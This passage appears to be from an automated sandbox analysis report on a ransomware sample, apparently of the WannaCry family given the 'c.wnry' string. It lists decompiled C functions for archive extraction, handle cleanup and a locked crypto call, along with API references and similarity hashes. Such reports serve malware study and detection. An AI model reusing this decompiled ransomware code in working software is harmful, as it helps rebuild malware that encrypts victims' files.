                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_stricmp
                    • String ID: P!@
                    • API String ID: 1278613211-1774101457
                    • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                    • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                    • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                    • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}












                    0x00401dfe
                    0x00401e00
                    0x00401e05
                    0x00401e0e
                    0x00401e1a
                    0x00401e21
                    0x00401e2d
                    0x00401e32
                    0x00401e38
                    0x00401e3b
                    0x00401e3f
                    0x00401e41
                    0x00401e4a
                    0x00401e5b
                    0x00401e60
                    0x00401e65
                    0x00401e82
                    0x00401e87
                    0x00401e87
                    0x00401e8a
                    0x00401e8b
                    0x00401e41
                    0x00401e90
                    0x00401e96
                    0x00401e98
                    0x00401e07
                    0x00401e07
                    0x00401e9d

                    APIs
                    • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                    • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: AttributesFilestrcmp
                    • String ID: c.wnry
                    • API String ID: 3324900478-3240288721
                    • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                    • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                    • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                    • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}




                    0x00405ca0
                    0x00405ca6
                    0x00405cb1
                    0x00405cb6
                    0x00405cb6
                    0x00405cbc
                    0x00405cbd
                    0x00405cc6
                    0x00405ca8
                    0x00405cac
                    0x00405cac

                    APIs
                    • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                    • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??3@CloseHandle
                    • String ID: $l@
                    • API String ID: 3816424416-2140230165
                    • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                    • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                    • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                    • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                    Download Yara Rule
                    C-Code - Quality: 25%
                    			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}







                    0x004019e5
                    0x004019ec
                    0x00401a19
                    0x00000000
                    0x00401a19
                    0x004019ee
                    0x004019f2
                    0x00401a08
                    0x00401a10
                    0x00401a11
                    0x00401a1d
                    0x00401a2c
                    0x00401a3a
                    0x00401a3e
                    0x00000000
                    0x00401a3e
                    0x00401a13
                    0x00000000

                    APIs
                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                    • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                    • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                    • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$Leave$Entermemcpy
                    • String ID:
                    • API String ID: 3435569088-0
                    • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                    • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                    • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                    • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                    Uniqueness

                    Uniqueness Score: -1.00%